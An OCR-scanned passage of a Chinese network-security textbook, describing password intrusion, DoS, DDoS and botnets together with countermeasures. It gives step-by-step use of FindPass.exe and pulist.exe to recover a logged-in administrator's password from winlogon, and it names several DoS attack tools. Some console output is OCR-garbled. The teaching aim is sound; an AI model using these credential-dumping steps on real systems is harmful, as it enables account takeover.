3.2 常见 网 络 攻防 方法 


目前 网 络 安全 研究 趋向 于 攻防 结合 ,追求 动态 安全 。 研 究 黑客 常用 攻击 手段 和 工具 必 
然 为 防御 技术 提供 启示 和 思路 。 研 究 黑客 攻击 手段 并 利用 这 些 攻 击 手段 和 工具 对 网 络 进行 
模拟 攻击 , 找 出 网 络 的 安全 漏洞 也 成 为 网 络 安全 维护 手段 的 一 个 重要 组 成 部 分 。 


3.2.1 口令 入 侵 及 其 防范 方法 


所 谓 口令 入 侵 ,是 指使 用 某 些 合法 用 户 的 账户 和 口令 登录 到 目的 主机 ,然后 再 实施 攻击 
活动 。 这 种 方法 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 ,然后 再 对 合法 用 户 
的 口令 进行 破译 。 不 过 攻击 者 已 大 量 采用 一 种 可 以 绕 开 或 屏蔽 口令 保护 的 程序 来 完成 这 项 
工作 。 对 于 那些 可 以 解 开 或 屏蔽 口令 保护 的 程序 通常 被 称 为 "Crack”。 实 际 上 真正 的 加 密 
口令 是 很 难 逆向 破解 的 。 

1. 口令 入 侵 方法 


(1) 暴力 破解 。 暴 力 破解 基本 上 是 一 种 被 动 攻击 的 方式 。 黑 客 在 知道 用 户 的 账户 号 
后 ,利用 一 些 专门 的 软件 强行 破解 用 户口 令 ,这 种 方法 不 受 网 段 限制 ,但 需要 有 足够 的 耐心 
和 时 间 。 这 些 工具 软件 可 以 自动 地 从 黑客 字典 中 取出 一 个 单词 ,作为 用 户 的 口令 输入 给 远 
端的 主机 ,申请 进入 系统 ,但 是 这 样 也 容易 因为 网 络 数 据 流量 和 访问 异常 而 被 网 络 管理 员 
发 现 。 

(2) 登录 界面 攻击 法 。 黑 客 可 以 在 被 攻击 的 主机 上 ,利用 程序 伪造 一 个 登录 界面 ,以 骗 
取 用 户 的 账号 和 密码 。 当 用 户 在 这 个 伪造 界面 上 输入 登录 信息 后 ,程序 可 将 用 户 的 输入 信 
息 记录 并 传送 到 黑客 的 主机 ,然后 关闭 界面 ,给 出 提示 信息 “系统 故障 ”或 “输入 错误 ”, 要 求 
用 户 重新 登录 。 重 新 出 现 的 登录 界面 才 是 系统 真正 的 登录 界面 。 
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(3) 网 络 监听 。 黑 客 可 以 通过 网 络 监听 非法 得 到 用 户 的 口令 ,这 类 方法 有 一 定 的 局 限 
性 ,但 危害 极 大 。 由 于 很 多 网 络 协议 根本 就 没有 采取 任何 加 密 或 身份 认证 技术 ,如 在 
telnet、FTP、HTTP、SMTP 等 传输 协议 中 ,用 户 账号 和 密码 信息 都 是 以 明文 格式 传输 的 ,此 
时 黑客 利用 数据 包 截取 工具 便 可 很 容易 地 收集 到 用 户 的 账号 和 密码 。 另 外 ,黑客 有 时 还 会 
利用 软件 和 硬件 工具 时 刻 监视 系统 主机 的 工作 ,等 待 记录 用 户 登录 信息 ,从 而 取得 用 户 
密码 。 

(4) 直接 侵入 网 络 服务 器 ,获得 服务 器 上 的 用 户口 令 文 件 后 ,用 暴力 破解 程序 对 口令 文 
件 破译 ,以 获得 用 户口 令 。 比 如 在 UNIX 系统 中 ,用 户口 令 一 般 都 存储 在 Shadow 文件 中 ， 
Windows 系统 中 则 是 存储 在 sam 文件 内 ,攻击 者 侵入 服务 器 后 只 要 获得 这 些 文件 ,就 可 以 
用 反 编 译 的 方法 将 这 些 文件 内 存储 的 用 户 资料 还 原 出 来 。 

这 种 方法 是 所 有 的 方法 中 危害 最 大 的 ,一 是 它 不 需要 一 遍 一 遍地 访问 服务 器 而 引起 网 
络 异常 ,从 而 被 管理 员 所 发 现 ; 二 是 操作 系统 的 文件 记录 方式 很 容易 被 反 编 译 破解 ; 三 
一 旦 口令 文件 被 破解 ,那么 这 个 服务 器 上 的 所 有 用 户 资料 都 将 暴露 在 攻击 者 面前 。 

2. 获取 管理 员 密码 


用 户 登 录 以 后 ,所 有 的 用 户 信息 都 存储 在 系统 的 一 个 进程 中 ,这 个 进程 是 winlogon. 
exe, 可 以 利用 程序 将 当前 登录 用 户 的 密码 解码 出 来 。 这 里 用 到 的 两 个 应 用 程序 是 
FindPass. exe 和 pulist. exe。 使 用 FindPass 等 工具 可 以 对 该 进程 进行 解码 ,然后 将 当前 用 
户 的 密码 显示 出 来 。 将 FindPass. exe 复制 到 C 盘 根 目录 ,执行 该 程序 ,将 得 到 当前 用 户 的 
登录 名 ,如 图 3-2 所 示 。 





icrosoft Windows 2999 [Uersion 5-99-2195] 
kc》 版权 所 有 1985-1998 Microsoft Corp- 


:Documents and Settings\hdnministratorycdN 
:findpass -exe 


To Find Password in the Winlogon process 
Usage: findpass.exe DonainNane UserNane PID-of-VinLogon 
he debug privilege has been added to PasswordReninder. 
he WinLogon process id is 192 (0x888086c0>. 
To find ADSERVER\MAdninistrator password in process 192 ... 
he encoded password is found at Bx668e6866 and has a length of 了 - 
he logon information is: ADSERVER/Adninistrator/123. 
he hash byte is: Gx9c. 


3-2 ”获取 用 户 名 和 密码 
如 果 有 多 人 登录 同一 台 计算 机 ,还 可 以 查看 其 他 用 户 的 密码 ,语法 如 下 ， 


FindPass. exe DomainName UserName PID ~ of — WinLogon. 


第 1 个 参数 DomainName 是 计算 机 的 名 称 ,通过 右 击 “我 的 电脑 ”, 选 择 “ 属 性 ”命令 可 
以 看 到 它 ; 第 2 个 参数 UserName 是 需要 查看 密码 的 用 户 名 ,这 个 用 户 必须 登录 到 系统 ， 
如 果 没 有 登录 到 系统 ,在 WinLogon 进程 中 不 会 有 该 用 户 的 密码 ; 第 3 个 参数 是 
WinLogon 进程 在 系统 的 进程 号 。 前 两 个 参数 都 容易 知道 , WinLogon 的 进程 号 只 有 到 任 
务 管 理 器 中 才能 看 到 ,也 可 以 利用 工具 pulist. exe 程序 查看 WinLogon 的 进程 号 。 使 用 的 
方法 如 图 3-3 所 示 。 所 以 只 要 可 以 侵入 某 个 系统 ,获取 管理 员 或 者 超级 用 户 的 密码 就 是 
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可 能 的 。 


选 定 | 

icrosoft Windows 2888 [Uersion 5.B8.2195] 
kKc》 版 权 所 有 1985-1998 Microsoft Corp- 
:Docunents and Settings\Adninistratorycd\ 


: ?pulist -exe 


ocess PID User 
Idle a 
System 8 
mss -exe 168 NI AUTHORITYNSYSTEM 
SFssvexe 一 196 NT AUTHORITYNSYSTEM 
inlogon .exe 192 NT AUTHORITYNSYSTEM 
lservicas exe 248 NI AUTHORITYNSYSTEM 
lsass -exe 268 NI AUTHORITYNSYSTEM 
Pvehost.exe 444 NT AUTHORITYNSYSTEM 


图 3-3 查看 WinLogon 的 进程 号 


3. 防范 口令 入 侵 攻 击 的 方法 

防范 口令 入 侵 比 较 好 的 方法 主要 有 : 

(1) 良好 的 口令 设置 是 防范 口令 入 侵 最 基本 、 最 有 效 的 方法 。 口 令 设 置 最 好 是 数字 、 字 
母 .标点 符号 .特殊 字符 的 随意 组 合 ,包含 的 元 素 至 少 包 括 下 列 字符 集中 的 3 种 : 大 写字 符 、 
小 写字 符 ,数字 , 非 数字 字母 符号 ; 英文 字母 可 采用 大 小 写 混合 排列 的 方式 ,口令 长 度 应 达 
到 8 位 以 上 , 越 长 越 安 全 。 

(2) 注意 保护 口令 安全 。 例 如 ,不 随意 丢弃 记 有 口令 的 纸张 ,不 在 手机 中 存储 口令 。 

(3) 保证 系统 的 安全 ,及 时 更 新 漏洞 补丁 ,关闭 不 必要 的 服务 和 端口 。 

(4) 在 Windows 系统 中 ,可 以 通过 设置 密码 最 长 期 限 、 最 短 密码 长 度 、 最 短 密码 期 限 、 
密码 唯一 性 账号 锁定 等 安全 的 密码 策略 来 进行 设置 ,也 可 以 启动 “用 户 必须 登录 方 能 更 改 
密码 ”的 选项 ,提高 抗 口令 猜测 攻击 的 能 力 。 

(5) 不 要 包含 可 能 含有 任何 用 户 信息 的 元 素 , 如 姓名 .公司 名 、 生 日 .年 龄 性别. 所 在 城 
市 .亲属 姓名 .代号 .常见 词 等 。 

(6) 注意 在 系统 中 保存 的 密码 应 采用 加 密 方式 存储 。 

(7) 在 Windows 中 禁止 存储 LM Hash ,而 采用 NT Hash。 


3.2.2 ”DoS 攻击 及 其 防范 


1. Dos 攻击 的 基本 原理 

拒绝 服务 攻击 是 攻击 者 通过 各 种 手段 来 消耗 网 络 带 宽 及 服务 器 的 系统 资源 ,最 终 导致 
服务 器 瘫痪 而 停止 提供 正常 的 网 络 服务 。 

拒绝 服务 攻击 主要 是 利用 TCP/IP 协议 本 身 的 漏洞 或 利用 网 络 中 各 个 操作 系统 的 IP 
协议 栈 的 实现 漏洞 来 发 起 攻击 。 这 种 攻击 主要 是 用 来 攻击 域名 服务 器 、 路 由 器 以 及 其 他 网 
络 操作 服务 ,攻击 之 后 造成 被 攻击 者 无 法 正常 运行 和 工作 ,严重 的 可 以 使 网 络 瘫痪 。 

拒绝 服务 攻击 会 降低 系统 资源 的 可 用 性 ,这 些 资源 可 以 是 CPU 时 间 、 磁 盘 空 间 、 打 印 
机 ,甚至 是 系统 管理 员 的 时 间 ,结果 往往 是 受 攻击 目标 的 效率 大 幅 降低 甚至 不 能 提供 相应 的 
服务 。 由 于 使 用 DoS 攻击 工具 的 技术 门槛 低 、 效 果 比 较 明显 ,因此 成 为 当今 网 络 中 十 分 流 
行 的 一 种 攻击 手段 ,被 黑客 广泛 使 用 。 
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DoS 攻击 的 基本 过 程 为 : 首先 攻击 者 向 服务 器 发 送 众多 的 带 有 虚假 地 址 的 请 求 , 服 务 
器 发 送 回复 信息 后 等 待 回 传 信息 ,由 于 地 址 是 伪造 的 ,所 以 服务 器 一 直 等 不 到 回 传 的 消息 ， 
分 配给 这 次 请 求 的 资源 就 始终 没有 被 释放 。 当 服务 器 等 待 一 定 的 时 间 后 ,连接 会 因 超时 而 
被 切断 ,攻击 者 会 再 度 传送 新 的 一 批 请 求 , 在 这 种 反复 发 送 伪 地 址 请 求 的 情况 下 ,服务 器 资 
源 最 终 会 被 耗 尽 。 

DoS 攻击 主要 有 3 种 类 型 : 带宽 攻击 ,协议 攻击 和 逮 辑 攻击 。 

(1) 带宽 攻击 是 最 古老 .最 常见 的 DoS 攻击 。 在 这 种 攻击 中 ,恶意 黑客 使 用 数据 流量 填 
满 网 络 。 脆 弱 的 网 络 或 网 络 设备 由 于 不 能 处 理发 送 给 它 的 大 量 流量 而 导致 系统 骨 溃 和 响应 
速度 减 慢 ,从 而 阻止 合法 用 户 的 访问 。 

攻击 者 在 网 络 上 传输 任何 流量 都 要 消耗 带宽 。 基 本 的 带宽 攻击 能 够 使 用 UDP 或 
ICMP 数据 包 消耗 掉 所 有 可 用 带宽 。 简 单 的 带宽 攻击 能 够 利用 服务 器 或 网 络 设备 有 吞吐 量 
限制 而 达到 目的 一 一 发 送 大 量 的 小 数据 包 。 快 速 发 送 大 量 数 据 包 的 攻击 通常 在 流量 达到 可 
用 带宽 限制 之 前 就 淹没 了 网 络 设备 。 路 由 器 、 防 火 墙 、 服 务 器 都 存在 输入 /输出 处 理 、 中 断 处 
理 `.CPU ,内 存 资源 等 方面 的 约束 。 读 取 包 头 进行 数据 转发 的 设备 在 处 理 大 速率 数据 包 时 
面临 压力 ,而 对 数据 包 知 吐 实 现 , 并 不 仅仅 靠 大 的 数据 流量 。 

(2) 协议 攻击 是 利用 网 络 协议 的 弱点 进行 的 网 络 攻 击 。 其 中 ,在 TCP/IP 协议 中 ,较为 
常见 的 攻击 是 攻击 者 发 送 大 量 的 SYN 数据 包 来 对 目标 主机 进行 攻击 。 图 3-4 表示 了 正常 
的 TCP 流量 ,图 3-5 显示 了 当 发 生 SYN 洪流 协议 攻击 时 的 情况 ,由 于 服务 器 (图 中 为 目标 
主机 B) 用 于 等 待 来 自 客户 机 (图 中 为 源 主机 A) 的 ACK 信息 包 的 TCP/IP 堆栈 是 有 限 的 ， 
如 果 缓 冲 区 被 等 待 队列 充满 , 它 将 拒绝 下 一 个 连接 请 求 。 因 此 ,攻击 者 就 可 以 利用 这 个 漏 
洞 ,在 瞬间 伪造 大 量 的 SYN 数据 报 ,而 又 不 回复 服务 器 的 SYN 十 ACK 信息 包 , 从 而 达到 攻 
击 的 目的 。 目 前 来 看 ,SYN 洪流 是 同时 进行 了 协议 攻击 和 带宽 攻击 的 一 种 攻击 。 


源 主机 A 目标 主机 B 
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图 3-4 正常 的 TCP 流量 图 3-5 SYN 洪流 


(3) 逻辑 攻击 。 这 种 攻击 包含 了 对 组 网 技术 的 深入 理解 ,因此 也 是 一 种 最 高 级 的 攻击 
类 型 。 逻 辑 攻击 的 一 个 典型 示例 是 LAND 攻击 ,这 里 攻击 者 发 送 具 有 相同 源 IP 地 址 和 目 
的 IP 地 址 的 伪 数 据 包 。 很 多 系统 不 能 够 处 理 这 种 引起 混乱 的 行为 ,从 而 导致 崩溃 。 

从 另外 一 个 角度 又 可 将 拒绝 服务 攻击 分 为 两 类 : 网 络 带宽 攻击 和 连通 性 攻击 。 带 宽 攻 
击 是 以 极 大 的 通信 和 量 冲 击 网 络 , 使 网 络 瘫痪 。 连 通 性 攻击 是 用 大 量 的 连接 请 求 冲击 网 络 , 达 
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到 破坏 目的 。 

拒绝 服务 攻击 与 其 他 的 攻击 方法 相 比较 ,具有 以 下 特点 ， 

(1) 难 确认 性 。 拒 绝 服务 攻击 很 难 被 判断 ,用 户 在 自己 的 服务 得 不 到 及 时 响应 时 ,一 般 
不 会 认为 是 自己 受到 攻击 ,而 是 认为 可 能 是 系统 故障 造成 一 时 的 服务 失效 。 

(2) 隐蔽 性 。 正 常 请 求 服务 会 隐藏 掉 拒绝 服务 攻击 的 过 程 。 

(3) 资源 有 限 性 。 由 于 计算 机 资源 有 限 ,容易 实现 拒绝 服务 攻击 。 

(4) 软件 复杂 性 ,由 于 软件 所 固有 的 复杂 性 ,难以 确保 软件 没有 缺陷 ,因而 攻击 者 有 机 
可 乘 , 可 以 直接 利用 软件 缺陷 进行 拒绝 服务 攻击 。 

2. 常见 的 DoS 攻击 方式 及 其 防范 措施 

1) DoS 攻击 的 检测 

DoS 攻击 通常 是 以 消耗 服务 器 端 资源 、 迫 使 服务 停止 响应 为 目标 ,通过 伪造 超过 服务 器 
处 理 能 力 的 请 求 数据 造成 服务 器 响应 阻塞 ,从 而 使 正常 的 用 户 请 求 得 不 到 应 答 ,以 实现 其 攻 
击 目 的 。 这 类 攻击 的 特点 在 于 : 易于 从 受 攻击 的 目标 来 判断 是 否 发 生 了 攻击 ,而 难以 追踪 
攻击 源 , 因 此 对 于 普通 用 户 ,需要 正确 地 检测 出 DoS 攻击 ,并 对 其 进行 防范 。 通 常 来 说 , 检 
测 出 DoS 攻击 相对 比较 直观 ,但 如 果 攻 击 是 持续 缓慢 进行 的 , 则 很 难 在 攻击 开始 的 第 一 时 
间 就 被 发 现 。 一 般 来 说 ,可 以 通过 以 下 症状 来 判断 是 否 发 生 了 DoS 攻击 : 频繁 的 网 络 活动 ; 
很 高 的 CPU 利用 率 ; 计算 机 无 响应 ; 计算 机 在 不 确定 的 时 间 崩 溃 。 

2) DoS 攻击 常用 的 工具 

DoS 攻击 通常 通过 一 些 攻击 工具 来 进行 ,了 解 了 这 些 攻击 工具 ,可 以 更 有 效 地 进行 防 
范 。 下 面 是 一 些 常用 的 DoS 攻击 工具 。 

(1) SYN Flood 工具 。 依 据 SYN Flood 攻击 的 原理 。 

(2) IP 碎片 类 攻击 工具 ,包括 Jot2、Teardrop 和 Newtear。 

Jot2 通过 向 攻击 对 象 发 送 分 片 的 ICMP 数据 报 , 当 分 片 合 成 完整 的 IP 数据 报时 ,其 最 大 
长 度 为 65 538, 比 最 大 IP 数据 报 长 度 65 535 大 , 则 系统 在 重组 数据 报时 , 因 发 生 错 误 而 崩溃 。 

Teardrop 向 被 攻击 对 象 发 送 被 分 成 两 个 分 片 的 IP 数据 报 。 这 两 个 分 片 在 重组 时 ,发 
生 重 概 , 即 第 二 个 IP 分 片 包含 在 第 一 片 中 ,系统 在 重组 数据 报时 , 因 发 生 错误 而 崩溃 。 

Newtear 由 Teardrop 衍生 而 来 ,两 者 原理 基本 相同 ,只 是 将 用 于 填充 的 数据 大 小 由 
28 改 为 20。 此 外 ,该 类 工具 还 有 Opentear、Overdrop、Bonk、Boink、Syndrop、Ssping 等 攻击 
工具 。 

(3) 网 络 放 大 攻击 工具 。 这 里 主要 有 两 种 工具 : Smurf 和 Fraggle。 

(4) 系统 漏洞 攻击 工具 。 这 里 的 漏洞 一 般 指 协议 漏洞 。 常 用 的 工具 有 Land、 Blat、 
Kod、Kox、Winnuke、Killwin 等 。 

3) DoS 攻击 典型 类 型 及 其 防范 措施 

(1) 同步 风暴 (SYN Flood)。 在 同步 风暴 攻击 中 ,利用 TCP 三 次 握手 协议 的 缺陷 ,攻击 
者 向 目标 主机 发 送 大 量 伪 造 源 地 址 的 SYN 报 文 ,目标 主机 分 配 必 要 的 资源 ,然后 向 源 地 址 
返回 SYN 十 ACK 包 , 并 等 待 源 端 返回 ACK 包 。 由 于 源 地 址 是 伪造 的 ,所 以 源 端 永远 都 不 
会 返回 ACK 报 文 , 受 害 主机 继续 发 送 SYN 十 ACK 包 , 并 将 TCP 半 连 接 放 入 端口 的 积压 队 
列 中 。 虽 然 一 般 的 主机 都 有 超时 机 制 和 默认 的 重 传 次 数 , 但 由 于 端口 的 TCP 半 连 接 队列 的 
长 度 是 有 限 的 ,如 果 不 断 向 受害 主机 发 送 大 量 的 TCP SYN 报 文 ,那么 TCP 半 连 接 队列 很 
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快 就 会 被 填 满 ,服务 器 拒绝 新 的 连接 ,将 导致 该 端口 无 法 响应 其 他 机 器 进行 的 连接 请 求 , 最 
终 使 受害 主机 的 资源 耗 尽 。 

防范 措施 : 为 了 有 效 地 防范 TCP SYN Flood 攻击 ,在 保证 通过 慢 速 网 络 的 用 户 可 以 正 
常 建立 到 服务 端的 合法 连接 的 同时 ,需要 尽 可 能 减少 服务 端 TCP Backlog 的 清空 时 间 ,并 
采用 TCP 连接 监控 的 工作 模式 ,在 防火 墙 处 就 能 够 过 滤 掉 来 自 同一 主机 的 后 续 连 接 , 当然 
还 要 根据 实际 的 情况 来 判断 。 

(2) Smurf 攻击 。 一 种 简单 的 Smurf 攻击 是 ,将 回复 地 址 设置 成 目标 网 络 的 广播 地 址 ， 
利用 ICMP 应 答 请 求 数据 包 ,使 该 网 络 的 所 有 主机 都 对 此 ICMP 应 答 请 求 做 出 应 答 ,导致 网 
络 阻塞 ,该 攻击 方式 比 Ping of Death 洪流 攻击 的 流量 高 出 一 到 两 个 数量 级 。 更 加 复杂 的 
Smurf 攻击 将 源 地 址 改 为 第 三 方 的 目标 地 址 ,最 终 导 致 第 三 方 网 络 阻塞 。 

防范 措施 : 去 掉 ICMP 服务 。 

(3) 垃圾 邮件 。 攻 击 者 利用 邮件 系统 制造 垃圾 邮件 信息 ,甚至 通过 专用 的 邮件 炸弹 程 
序 给 受害 用 户 的 信箱 发 送 垃圾 邮件 , 耗 尽 用 户 信箱 的 磁盘 空间 ,使 用 户 无 法 使 用 这 个 邮箱 。 

防范 措施 : 限制 邮件 的 转发 功能 。 即 将 凡是 来 自 管 理 域 范围 之 外 的 IP 地 址 通过 本 地 
SMTP 服务 进行 的 中 转 邮 件 转发 请 求 一 概 予 以 拒绝 。 

发 送 邮 件 认证 功能 。 扩 展 的 SMTP 通信 协议 (RFC 2554) 中 包含 了 一 种 基于 SASL 的 
发 送 邮 件 认 证 方法 ,目前 多 数 邮 件 系统 都 支持 明文 口令 ,MD5 认证 ,其 至 基于 公 钥 证 书 的 认 
证 方式 。 发 送 邮件 认证 功能 只 是 在 方便 用 户 使 用 的 条 件 下 限制 了 邮件 转发 功能 ,但 是 无 法 
拒绝 接收 以 本 地 账号 为 地 址 的 垃圾 邮件 。 

邮件 服务 器 的 反 向 域名 解析 功能 。 启 动 该 功能 ,可 以 拒绝 接收 所 有 没有 注册 域名 的 地 
址 发 来 的 信息 。 目 前 ,多 数 垃圾 邮件 发 送 者 使 用 动态 分 配 或 者 没有 注册 域名 的 IP 地 址 来 发 
送 垃 圾 邮件 ,以 逃避 追踪 。 因 此 在 邮件 服务 器 上 拒绝 接收 来 自 没有 域名 的 站 点 发 来 的 信息 
可 以 大 大 降低 垃圾 邮件 的 数量 。 

设置 邮件 过 滤 功 能 ,对 邮件 进行 过 滤 。 垃 圾 邮件 的 过 滤 可 以 基于 IP 地 址 .邮件 的 信 头 
或 者 邮件 的 内 容 ,过 滤 位 置 可 以 在 用 户 .邮件 接收 工具 .邮件 网 关 、 网 络 网 关 /路 由 器 /防火 墙 
等 多 个 层次 实施 。 

3. 防范 DoS 攻击 的 专用 网 络 安全 设备 


DoS 攻击 的 目的 是 阻止 合法 用 户 访问 他 们 所 需要 的 服务 ,使 提供 服务 的 系统 和 网 络 无 
法 正常 运行 。 有效 地 检测 这 种 攻击 ,并 对 这 类 攻击 进行 防范 的 主要 方法 是 使 用 多 种 网 络 安 
全 的 专用 设备 和 工具 ,这 些 设备 和 工具 主要 有 防火 墙 基 于 主机 的 IDS 一 一 入 侵 检 测 系 统 、 
基于 特征 的 网 络 入 侵 检 测 系统 NIDS、 网 络 异常 行为 检测 器 。 例 如 ,Cisco PIX Firewall 提供 
了 一 种 称 为 Flood Defender 的 功能 ,能 够 抵御 TCP SYN 洪流 的 攻击 。Flood Defender 的 
工作 原理 是 : 检查 连接 到 指定 服务 上 的 未 回答 SYN 的 数量 ,如 果 出 现 异常 情况 , 则 对 之 后 
的 连接 采取 限制 , 即 当 达到 限制 数量 时 ,所 有 其 他 连接 都 被 丢弃 ,以 保护 内 部 服务 器 。 

关于 防火 墙 .IDS、NIDS 将 在 第 4 章 专门 介绍 。 这 里 简单 介绍 网 络 异常 检测 器 。 

尽管 入 侵 检测 系统 能 够 被 用 于 抵御 大 部 分 普通 的 DoS 攻击 ,但 对 抵御 0day 类 型 的 攻 
击 效果 不 好 。 针 对 这 样 的 需求 ,出 现 了 网 络 异 常 检测 器 。 网 络 异常 检测 器 主要 设计 用 于 观 
察 不 寻常 的 网 络 流量 ,观察 的 结果 与 参考 点 相对 照 ,如 果 流 量 超出 了 一 定 的 限度 , 则 进行 报 
警 ,并 采取 相应 的 应 对 措施 。 例 如 ,Cisco Traffic Anomaly Detector XT 就 是 一 款 这 样 的 网 
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络 异常 检测 器 , 它 能 够 监测 拒绝 服务 攻击 力 至 分 布 式 拒绝 服务 攻击 (DDoS) 的 网 络 流量 。 

4. 防范 DoS 攻击 的 其 他 方法 

检测 是 否 发 生 了 DoS 攻击 ,只 是 阻止 此 类 攻击 必 备 的 第 一 步 。 如 果 能 对 DoS 攻击 进行 
预防 , 则 可 以 大 幅度 减少 DoS 攻击 的 范围 ,显著 地 降低 系统 受 DoS 攻击 影响 的 程度 。 实 际 
上 ,再 好 的 防护 系统 也 无 法 阻止 所 有 的 攻击 ,只 能 减少 攻击 的 发 生 概率 ,因此 应 该 首先 提高 
系统 的 安全 性 ,使 系统 本 身 具 有 较 好 的 攻击 抵抗 性 。 

提高 系统 安全 性 的 方法 通常 有 : 安装 服务 包 和 修补 包 ; 只 运行 必要 的 服务 ; 安装 防火 
墙 ; 安装 入 侵 检测 系统 ; 安装 防 病 毒 软件 ; 关闭 穿越 路 由 器 和 防火 墙 的 ICMP。 

一 个 设计 较 好 的 安全 性 高 的 系统 ,通常 是 上 述 这 些 方法 的 组 合 , 某 个 单独 的 产品 或 方法 
很 难 做 到 全 面 的 防护 。 

通过 安装 服务 包 ,能够 最 大 限度 地 减少 因应 用 程序 和 协议 的 漏洞 被 攻击 的 机 会 。 通 常 ， 
软件 厂商 会 定期 发 布 修复 安全 漏洞 的 服务 包 和 修补 包 。 

此 外 ,还 应 对 系统 的 安全 性 进行 强化 配置 。 强 化 系统 的 安全 性 包括 两 部 分 : 强化 网 络 
设备 的 安全 性 和 强化 应 用 程序 的 安全 性 。 对 于 网 络 设备 来 说 ,其 设备 本 身 应 具备 一 定 的 安 
全 性 ,以 便 抵御 各 种 攻击 对 设备 本 身 的 破坏 ,因为 一 旦 设备 受到 破坏 , 则 整个 网 络 系统 就 会 
产生 薄弱 点 ,易于 成 为 攻击 者 进入 的 入 口 。 对 于 应 用 程序 来 说 , 则 需要 加 强 自 身 的 安全 性 
能 ,以 防 被 攻击 者 控制 或 植 人 其 他 攻击 程序 。 

5. 分 布 式 拒绝 服务 (DDoS) 攻 击 及 其 防范 

1) DDoS 攻击 的 基本 原理 

DDoS 攻击 手段 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 。 单 一 的 DoS 攻 
击 一 般 是 采用 一 对 一 方式 , 当 被 攻击 目标 的 CPU 速度 低 、 内 存 小 或 者 网 络 带宽 小 等 等 各 项 
性 能 指标 不 高 时 ,其 效果 是 明显 的 。 然 而 , 随 着 计算 机 与 网 络 技术 的 发 展 , 计 算 机 的 处 理 能 
力 迅 速 增长 ,内 存 大 大 增加 ,同时 也 出 现 了 千 兆 级 别 乃 至 万 兆 级 别 的 网 络 , 这 就 使 得 DoS 攻 
击 的 困难 程度 加 大 了 ,因为 目标 对 恶意 攻击 包 的 消化 能 力 大 大 提高 ,所 以 一 对 一 的 攻击 方式 
就 不 会 产生 什么 效果 。 

在 这 种 情况 下 ,分 布 式 拒绝 服务 攻击 手段 (DDoS) 应 运 而 生 。 假 如 被 攻击 目标 的 计算 机 
与 网 络 的 处 理 能 力 提高 了 10 倍 , 采 用 原来 的 一 对 一 方式 时 用 一 台 攻 击 机 来 攻击 不 再 能 起 作 
用 的 话 ,此 时 若 攻击 者 使 用 10 台 甚 至 更 多 的 攻击 机 同时 进行 攻击 , 则 一 定 会 实现 攻击 的 目 
的 ,因此 ,DDoS 攻击 就 是 利用 更 多 的 攻击 机 (又 称 侧 偶 机 ) 来 发 起 进攻 ,以 比 从 前 更 大 的 规 
模 来 进攻 受害 者 的 一 种 攻击 方式 。 

DDoS 攻击 的 示意 图 如 图 3-6 所 示 。DDoS 与 DoS 攻击 的 原理 基本 相同 。 攻 击 者 首先 
通过 植 和 人 某 种 特定 程序 (僵尸 程序 或 bot 程序 ,一 段 可 以 自动 执行 预先 设 定 功能 ,可 以 被 控 
制 ,具有 一 定 人 工 智 能 的 程序 ,该 程序 可 以 通过 木马 .蠕虫 等 进行 传播 ) 控 制 若 干 台 机 器 作为 
主 控 端 (控制 便 偶 机 ) ,然后 通过 该 主 控 端 向 更 多 的 机 器 植 人 某 种 攻击 程序 ,由 这 些 代理 端 
(攻击 倪 儒 机) 向 目标 主机 发 起 攻击 的 一 种 攻击 方式 。 

由 于 在 DDoS 攻击 中 ,攻击 者 和 受 攻 击 机 器 的 力量 对 比 非常 悬殊 ,在 这 种 悬殊 的 力量 对 
比 下 ,被 攻击 的 主机 很 快 失去 反应 能 力 ,无 法 提供 服务 ,从 而 达到 攻击 的 目的 。 目 前 ,这 种 攻 
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击 方式 是 实施 最 为 快速 攻击 能 力 最 强 、 破 坏 性 最 大 的 一 种 方式 。 


全 网络 






被 攻击 者 


图 3-6 DDoS 攻击 过 程 示意 图 


2) 伪 尸 网 络 

由 攻击 者 植 入 伪 尸 程序 的 计算 机 (这 些 计算 机 受 黑 客 控制 ,也 称 为 “肉鸡 ”) 组 成 的 网 络 
称 为 僵尸 网 络 (Botnet) ,该 网 络 由 大 量 能 够 实现 恶意 功能 的 Bot、Command & Control 
Server( 命 令 和 控制 服务 器 ,控制 者 通过 该 服务 器 发 送 命令 ,进行 控制 ) 和 控制 者 组 成 ,能 够 
受 攻击 者 控制 。 

Botnet 并 不 是 指 物理 意义 上 具有 拓扑 架构 的 网 络 , 它 具 有 一 定 的 分 布 性 ,该 网 络 会 随 
着 Bot 程序 的 不 断 传播 ,而 不 断 有 新 位 置 的 僵尸 计算 机 添加 到 这 个 网 络 中 来 ,从 而 可 以 使 网 
络 节点 的 规模 快速 扩大 。 

僵尸 程序 与 蠕虫 最 大 的 区 别 就 在 于 蠕虫 具有 主动 传播 性 ,另外 蠕虫 的 攻击 行为 不 受 人 
控制 ,而 相反 僵尸 程序 的 存在 就 是 为 了 使 得 攻击 者 能 够 控制 受 感染 的 计算 机 。 僵 尸 程序 和 
木马 有 着 功能 的 相似 性 一 一 远程 控制 计算 机 ,但 在 功能 实现 上 略 有 区 别 ,僵尸 程序 都 能 突破 
内 网 和 防火 墙 限制 ,这 是 传统 正 向 连接 的 木马 无 法 比拟 的 。 僵 尸 程序 使 用 特有 的 IRC 协议 
下 的 DCC 命令 或 者 其 他 载体 进行 传播 ,由 于 预 设 指令 的 存在 ,传播 过 程 更 显 主动 , 且 受 感染 
的 计算 机 仍 受 控制 ,这 些 比 起 木马 技术 来 说 更 加 先进 和 隐蔽 。 

Botnet 的 最 主要 的 特点 : 它 有 别 于 以 往 简单 的 安全 事件 ,是 一 个 具有 极 大 危害 性 的 攻 
击 平台 。 它 可 以 一 对 多 地 执行 相同 的 恶意 行为 ,将 攻击 源 从 一 个 转化 为 多 个 ,乃至 一 个 庞大 
的 网 络 体系 ,通过 网 络 来 控制 受 感染 的 系统 ,造成 更 大 程度 的 网 络 危 害 ,比如 可 以 同时 对 某 
目标 网 站 进行 DDoS 攻击 ,同时 发 送 大 量 的 垃圾 邮件 ,在 短 时 间 内 窃取 大 量 敏 感 信息 、 抢 占 
系统 资源 甚至 进行 非法 目的 件 利 等 。 

僵尸 网 络 正 是 这 种 一 对 多 的 控制 关系 .使 得 攻击 者 能 够 以 极 低 的 代价 高 效 地 控制 大 量 
的 资源 为 其 服务 ,在 执行 恶意 行为 的 时 候 ,Botnet 充当 了 一 个 攻击 平台 的 角色 ,这 也 就 使 得 
Botnet 不 同 于 简单 的 病毒 和 蠕虫 :也 与 通常 意义 的 木马 有 所 不 同 。 目 前 ,僵尸 网 络 已 经 成 
